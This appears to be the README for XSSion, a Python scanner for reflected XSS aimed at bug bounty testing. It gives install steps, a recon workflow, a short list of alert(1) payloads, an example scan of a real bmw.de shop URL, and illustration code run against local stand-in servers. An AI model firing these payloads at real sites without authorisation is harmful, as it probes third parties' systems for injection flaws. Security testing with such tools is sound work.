XSSion is a fast, transparent Reflected XSS scanning tool designed for bug bounty hunters and penetration testers.
It shows every payload being tested in real time and clearly highlights reflections in the response.
- ⚡ Quickly finds reflected XSS vectors
- 🎯 Shows live testing in the terminal
- 🔍 Automatically detects parameters (even blank ones like `?param=`)
- 📌 Saves results to `XSSion.txt`
- 🐍 Written in Python 3
- 💥 Beginner friendly and bug bounty ready
Clone the repository:

```
git clone https://github.com/alhamrizvi-cloud/XSSion.git
cd XSSion
```

Install dependencies:

```
pip3 install -r requirements.txt
```

To run xssion from anywhere:

- Add the shebang at the top of `xssion.py` if not present:

```
#!/usr/bin/env python3
```

- Give execute permissions:

```
chmod +x xssion.py
```

- Move it to a directory in your PATH:

```
sudo mv xssion.py /usr/local/bin/xssion
```

Now you can run:

```
xssion <URL> <payloads.txt>
```

or, without installing:

```
python3 xssion.py "<URL>?param=" xss_all_payloads.txt
```
Example:

```
xssion \
  "https://www.bmw.de/de/shop/ls/cp/physical-goods/de-BF_ACCESSORY?tl=" \
  xss_payloads.txt
```

`xss_payloads.txt`:

```
"><svg/onload=alert(1)>
<script>alert(1)</script>
"><img src=x onerror=alert(1)>
```

Reflected payloads are saved to `XSSion.txt`, one line per finding. Example:

```
[XSS] https://target.com/search?q=<script>alert(1)</script> | <script>alert(1)</script>
```
- 🧪 Automatic parameter detection
- 🟡 Shows each payload tested
- 🔴 Highlights reflected ones
- 📊 Results logged to file
Suggested recon workflow:

```
gau / katana
    ↓
paramspider / arjun
    ↓
filter URLs with params
    ↓
XSSion
    ↓
if reflected → manual verification
```
- XSSion only finds reflections; a reflected payload is a candidate, so verify manually before reporting the parameter as vulnerable
- Some sites sanitize input or HTML-encode the reflected value, so a reflection is not always exploitable
- Works best during early recon
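The two points above, parameter detection on blank values like `?tl=` and the difference between a raw and an HTML-encoded reflection, in a small self-contained example. This is added illustration code, not XSSion's own implementation: the two "servers" are constructed stand-ins (no network), the injected value is URL-encoded (an assumption about how the tool builds URLs), and `classify` shows why an encoded echo should not be logged as a finding.

```python
import html
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Payloads taken from the xss_payloads.txt shown in this README.
PAYLOADS = ['"><svg/onload=alert(1)>', '<script>alert(1)</script>']

def discover_params(url):
    """Names of query parameters, including blank ones such as ?tl= ."""
    return [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]

def inject(url, param, payload):
    """Return `url` with `param` set to `payload` (URL-encoded; an assumption)."""
    parts = urlsplit(url)
    pairs = [(k, payload if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))

def classify(body, payload):
    """'raw'     = payload echoed unencoded (reflected XSS candidate)
       'encoded' = only an HTML-escaped copy is present (output encoding works)
       'none'    = not reflected at all"""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "none"

# Constructed stand-ins for a response: one echoes the value raw, one escapes it.
def vulnerable_server(value):
    return f'<input name="tl" value="{value}">'

def hardened_server(value):
    return f'<input name="tl" value="{html.escape(value, quote=True)}">'

def scan(url, server):
    """Try every payload in every parameter; return XSSion-style result lines."""
    findings = []
    for param in discover_params(url):
        for payload in PAYLOADS:
            test_url = inject(url, param, payload)
            if classify(server(payload), payload) == "raw":
                findings.append(f"[XSS] {test_url} | {payload}")
    return findings

if __name__ == "__main__":
    url = "https://example.com/shop?tl="
    print(scan(url, vulnerable_server))  # two findings
    print(scan(url, hardened_server))    # [] : encoded echo is not a finding
```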
Requirements:

- Python 3.6+
- Linux & macOS
Author: Alham Rizvii — Bug Bounty Hunter & Cybersecurity Enthusiast

Contributions are welcome.
This project is licensed under the MIT License.
See the LICENSE file for details.